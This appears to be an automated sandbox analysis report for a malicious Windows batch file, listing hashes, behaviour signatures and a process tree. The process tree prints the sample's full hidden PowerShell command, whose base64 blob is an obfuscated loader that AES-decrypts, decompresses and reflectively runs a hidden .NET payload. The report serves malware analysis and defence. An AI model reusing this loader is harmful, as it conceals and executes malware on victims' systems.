Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
30/03/2025, 18:40
Static task
static1
Behavioral task
behavioral1
Sample
StartupScript_06149941.cmd
Resource
win7-20250207-en
4 signatures
150 seconds
General
-
Target
StartupScript_06149941.cmd
-
Size
173KB
-
MD5
dd2c10bb72f3966b578922210671c8ad
-
SHA1
40ce88863c1cf5fd7eb1a822c9f0e4c3746ff166
-
SHA256
8a04e9a762cfd139b2da4df34b2431c9d1381968153b96997e1a793c7cbc0fff
-
SHA512
4c96deda1671bdeb2555f74fa22265e65068cb24edfaaae07027cc947c3073d6be88614132e2f7d5650da662bebe5287cb9cb71949aa4c066c063dc3761dea29
-
SSDEEP
3072:NnY3BcQvzcjz2mB9wjZHVvNPJlaBMNPjTMiJ9rW/7vGJAcJGcC+KL0wkW9V8DqH+:xY3BcQvzcjz2mB9wjZ1FRl0MFFrEbHfm
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2480 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2480 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2480 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2872 wrote to memory of 2244 2872 cmd.exe 29 PID 2872 wrote to memory of 2244 2872 cmd.exe 29 PID 2872 wrote to memory of 2244 2872 cmd.exe 29 PID 2244 wrote to memory of 2480 2244 cmd.exe 31 PID 2244 wrote to memory of 2480 2244 cmd.exe 31 PID 2244 wrote to memory of 2480 2244 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\StartupScript_06149941.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\StartupScript_06149941.cmd"2⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzaGt3ZmQgPSBAJw0KJHVzZXJzZHFOYW1lIHNkcT0gJGVuc2RxdjpVU0VzZHFSTkFNRXNkcTskaGprc2RxID0gIkNzZHE6XFVzZXNkcXJzXCR1c2Rxc2VyTmFzZHFtZVxkd3NkcW0uYmF0c2RxIjtpZiBzZHEoVGVzdHNkcS1QYXRoc2RxICRoamtzZHEpIHsgIHNkcSAgV3Jpc2RxdGUtSG9zZHFzdCAiQnNkcWF0Y2ggc2RxZmlsZSBzZHFmb3VuZHNkcTogJGhqc2RxayIgLUZzZHFvcmVncnNkcW91bmRDc2Rxb2xvciBzZHFDeWFuO3NkcSAgICAkc2RxZmlsZUxzZHFpbmVzIHNkcT0gW1N5c2Rxc3RlbS5zZHFJTy5GaXNkcWxlXTo6c2RxUmVhZEFzZHFsbExpbnNkcWVzKCRoc2RxamssIFtzZHFTeXN0ZXNkcW0uVGV4c2RxdC5FbmNzZHFvZGluZ3NkcV06OlVUc2RxRjgpOyBzZHEgICBmb3NkcXJlYWNoc2RxICgkbGlzZHFuZSBpbnNkcSAkZmlsc2RxZUxpbmVzZHFzKSB7IHNkcSAgICAgc2RxICBpZiBzZHEoJGxpbnNkcWUgLW1hc2RxdGNoICdzZHFeOjo6IHNkcT8oLispc2RxJCcpIHtzZHEgICAgIHNkcSAgICAgc2RxICBXcmlzZHF0ZS1Ib3NkcXN0ICJJc2RxbmplY3RzZHFpb24gY3NkcW9kZSBkc2RxZXRlY3RzZHFlZCBpbnNkcSB0aGUgc2RxYmF0Y2hzZHEgZmlsZXNkcS4iIC1Gc2Rxb3JlZ3JzZHFvdW5kQ3NkcW9sb3Igc2RxQ3lhbjtzZHEgICAgIHNkcSAgICAgc2RxICB0cnlzZHEgeyAgIHNkcSAgICAgc2RxICAgICBzZHEgICAkZHNkcWVjb2Rlc2RxZEJ5dGVzZHFzID0gW3NkcVN5c3Rlc2RxbS5Db25zZHF2ZXJ0XXNkcTo6RnJvc2RxbUJhc2VzZHE2NFN0cnNkcWluZygkc2RxbWF0Y2hzZHFlc1sxXXNkcS5Ucmltc2RxKCkpOyBzZHEgICAgIHNkcSAgICAgc2RxICAgICBzZHEkaW5qZXNkcWN0aW9uc2RxQ29kZSBzZHE9IFtTeXNkcXN0ZW0uc2RxVGV4dC5zZHFFbmNvZHNkcWluZ106c2RxOlVuaWNzZHFvZGUuR3NkcWV0U3Ryc2RxaW5nKCRzZHFkZWNvZHNkcWVkQnl0c2RxZXMpOyBzZHEgICAgIHNkcSAgICAgc2RxICAgICBzZHFXcml0ZXNkcS1Ib3N0c2RxICJJbmpzZHFlY3Rpb3NkcW4gY29kc2RxZSBkZWNzZHFvZGVkIHNkcXN1Y2Nlc2Rxc3NmdWxzZHFseS4iIHNkcS1Gb3Jlc2RxZ3JvdW5zZHFkQ29sb3NkcXIgR3Jlc2RxZW47ICBzZHEgICAgIHNkcSAgICAgc2RxICAgIFdzZHFyaXRlLXNkcUhvc3Qgc2RxIkV4ZWNzZHF1dGluZ3NkcSBpbmplc2RxY3Rpb25zZHEgY29kZXNkcS4uLiIgc2RxLUZvcmVzZHFncm91bnNkcWRDb2xvc2RxciBZZWxzZHFsb3c7IHNkcSAgICAgc2RxICAgICBzZHEgICAgIHNkcUludm9rc2RxZS1FeHBzZHFyZXNzaXNkcW9uICRpc2RxbmplY3RzZHFpb25Db3NkcWRlOyAgc2RxICAgICBzZHEgICAgIHNkcSAgICBic2RxcmVhaztzZHEgICAgIHNkcSAgICAgc2RxICB9IGNzZHFhdGNoIHNkcXsgICAgc2RxICAgICBzZHEgICAgIHNkcSAgV3Jpc2RxdGUtSG9zZHFzdCAiRXNkcXJyb3Igc2RxZHVyaW5zZHFnIGRlY3NkcW9kaW5nc2RxIG9yIGVzZHF4ZWN1dHNkcWluZyBpc2RxbmplY3RzZHFpb24gY3NkcW9kZTogc2RxJF8iIC1zZHFGb3JlZ3NkcXJvdW5kc2RxQ29sb3JzZHEgUmVkO3NkcSAgICAgc2RxICAgICBzZHEgIH07IHNkcSAgICAgc2RxICB9OyBzZHEgICB9O3NkcX0gZWxzc2RxZSB7ICBzZHEgICAgV3NkcXJpdGUtc2RxSG9zdCBzZHEiU3lzdHNkcWVtIEVyc2Rxcm9yOiBzZHFCYXRjaHNkcSBmaWxlc2RxIG5vdCBzZHFmb3VuZHNkcTogJGhqc2RxayIgLUZzZHFvcmVncnNkcW91bmRDc2Rxb2xvciBzZHFSZWQ7IHNkcSAgIGV4c2RxaXQ7fTtzZHFmdW5jdHNkcWlvbiBic2Rxa2V3bChzZHEkcGFyYXNkcW1fdmFyc2RxKXsJJGFzZHFlc192YXNkcXI9W1N5c2Rxc3RlbS5zZHFTZWN1cnNkcWl0eS5Dc2RxcnlwdG9zZHFncmFwaHNkcXkuQWVzc2RxXTo6Q3JzZHFlYXRlKHNkcSk7CSRhc2RxZXNfdmFzZHFyLk1vZHNkcWU9W1N5c2Rxc3RlbS5zZHFTZWN1cnNkcWl0eS5Dc2RxcnlwdG9zZHFncmFwaHNkcXkuQ2lwc2RxaGVyTW9zZHFkZV06OnNkcUNCQzsJc2RxJGFlc19zZHF2YXIuUHNkcWFkZGluc2RxZz1bU3lzZHFzdGVtLnNkcVNlY3Vyc2RxaXR5LkNzZHFyeXB0b3NkcWdyYXBoc2RxeS5QYWRzZHFkaW5nTXNkcW9kZV06c2RxOlBLQ1NzZHE3OwkkYXNkcWVzX3Zhc2Rxci5LZXlzZHE9W1N5c3NkcXRlbS5Dc2Rxb252ZXJzZHF0XTo6RnNkcXJvbUJhc2Rxc2U2NFNzZHF0cmluZ3NkcSgnL3BDc2RxRGdteklzZHFYRExOYXNkcVRYdllYc2RxenZXWjJzZHExZ2hzcHNkcUJPVVN0c2RxQkdYUGhzZHFFQkxIMHNkcT0nKTsJc2RxJGFlc19zZHF2YXIuSXNkcVY9W1N5c2Rxc3RlbS5zZHFDb252ZXNkcXJ0XTo6c2RxRnJvbUJzZHFhc2U2NHNkcVN0cmluc2RxZygnbHhzZHFPK2pDZ3NkcVFsbmRXc2RxeFdxQ1dzZHF1N2pQQXNkcT09Jyk7c2RxCSRkZWNzZHFyeXB0b3NkcXJfdmFyc2RxPSRhZXNzZHFfdmFyLnNkcUNyZWF0c2RxZURlY3JzZHF5cHRvcnNkcSgpOwkkc2RxcmV0dXJzZHFuX3ZhcnNkcT0kZGVjc2RxcnlwdG9zZHFyX3ZhcnNkcS5UcmFuc2Rxc2Zvcm1zZHFGaW5hbHNkcUJsb2Nrc2RxKCRwYXJzZHFhbV92YXNkcXIsIDAsc2RxICRwYXJzZHFhbV92YXNkcXIuTGVuc2RxZ3RoKTtzZHEJJGRlY3NkcXJ5cHRvc2Rxcl92YXJzZHEuRGlzcHNkcW9zZSgpc2RxOwkkYWVzZHFzX3ZhcnNkcS5EaXNwc2Rxb3NlKClzZHE7CSRyZXNkcXR1cm5fc2RxdmFyO31zZHFmdW5jdHNkcWlvbiBzc2RxamFyYShzZHEkcGFyYXNkcW1fdmFyc2RxKXsJJG1zZHFncGc9TnNkcWV3LU9ic2RxamVjdCBzZHFTeXN0ZXNkcW0uSU8uc2RxTWVtb3JzZHF5U3RyZXNkcWFtKCwkc2RxcGFyYW1zZHFfdmFyKXNkcTsJJG51c2RxZGNuPU5zZHFldy1PYnNkcWplY3Qgc2RxU3lzdGVzZHFtLklPLnNkcU1lbW9yc2RxeVN0cmVzZHFhbTsJJHNkcXlyb2Flc2RxPU5ldy1zZHFPYmplY3NkcXQgU3lzc2RxdGVtLklzZHFPLkNvbXNkcXByZXNzc2RxaW9uLkdzZHFaaXBTdHNkcXJlYW0oc2RxJG1ncGdzZHEsIFtJT3NkcS5Db21wc2RxcmVzc2lzZHFvbi5Db3NkcW1wcmVzc2Rxc2lvbk1zZHFvZGVdOnNkcTpEZWNvc2RxbXByZXNzZHFzKTsJJHNkcXlyb2Flc2RxLkNvcHlzZHFUbygkbnNkcXVkY24pc2RxOwkkeXJzZHFvYWUuRHNkcWlzcG9zc2RxZSgpOwlzZHEkbWdwZ3NkcS5EaXNwc2Rxb3NlKClzZHE7CSRudXNkcWRjbi5Ec2RxaXNwb3NzZHFlKCk7CXNkcSRudWRjc2Rxbi5Ub0FzZHFycmF5KHNkcSk7fWZ1c2RxbmN0aW9zZHFuIG9yanNkcWdjKCRwc2RxYXJhbV9zZHF2YXIsJHNkcXBhcmFtc2RxMl92YXJzZHEpewkkZnNkcWk9W1N5c2Rxc3RlbS5zZHFSZWZsZXNkcWN0aW9uc2RxLkFzc2VzZHFtYmx5XXNkcTo6KCdkc2RxYW9MJ1tzZHEtMS4uLXNkcTRdIC1qc2Rxb2luICdzZHEnKShbYnNkcXl0ZVtdc2RxXSRwYXJzZHFhbV92YXNkcXIpOwkkc2RxeWx0PSRzZHFmaS5FbnNkcXRyeVBvc2RxaW50OwlzZHEkeWx0LnNkcUludm9rc2RxZSgkbnVzZHFsbCwgJHNkcXBhcmFtc2RxMl92YXJzZHEpO30kaHNkcW9zdC5Vc2RxSS5SYXdzZHFVSS5XaXNkcW5kb3dUc2RxaXRsZSBzZHE9ICRoanNkcWs7JGxsc2RxYj1bU3lzZHFzdGVtLnNkcUlPLkZpc2RxbGVdOjpzZHEoJ3R4ZXNkcVRsbEFkc2RxYWVSJ1tzZHEtMS4uLXNkcTExXSAtc2Rxam9pbiBzZHEnJykoJHNkcWhqaykuc2RxU3BsaXRzZHEoW0VudnNkcWlyb25tc2RxZW50XTpzZHE6TmV3THNkcWluZSk7c2RxZm9yZWFzZHFjaCAoJHNkcXdxdGhjc2RxIGluICRzZHFsbGIpIHNkcXsJaWYgc2RxKCR3cXRzZHFoYy5TdHNkcWFydHNXc2RxaXRoKCdzZHE6OiAnKXNkcSkJewkJc2RxJG5nbHlzZHE9JHdxdHNkcWhjLlN1c2RxYnN0cmlzZHFuZygzKXNkcTsJCWJyc2RxZWFrOwlzZHF9fSRta3NkcXg9W3N0c2RxcmluZ1tzZHFdXSRuZ3NkcWx5LlNwc2RxbGl0KCdzZHFcJyk7JHNkcXBmcj1zc2RxamFyYSBzZHEoYmtld3NkcWwgKFtDc2Rxb252ZXJzZHF0XTo6RnNkcXJvbUJhc2Rxc2U2NFNzZHF0cmluZ3NkcSgkbWt4c2RxWzBdKSlzZHEpOyRlaXNkcXpmPXNqc2RxYXJhIChzZHFia2V3bHNkcSAoW0Nvc2RxbnZlcnRzZHFdOjpGcnNkcW9tQmFzc2RxZTY0U3RzZHFyaW5nKHNkcSRta3hbc2RxMV0pKSlzZHE7b3JqZ3NkcWMgJHBmc2RxciAkbnVzZHFsbDtvcnNkcWpnYyAkc2RxZWl6ZiBzZHEoLFtzdHNkcXJpbmdbc2RxXV0gKCdzZHElKicpKXNkcTsNCidADQoNCiRpeWtiYXUgPSAkc2hrd2ZkIC1yZXBsYWNlICdzZHEnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkaXlrYmF1DQo=')) | Invoke-Expression"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-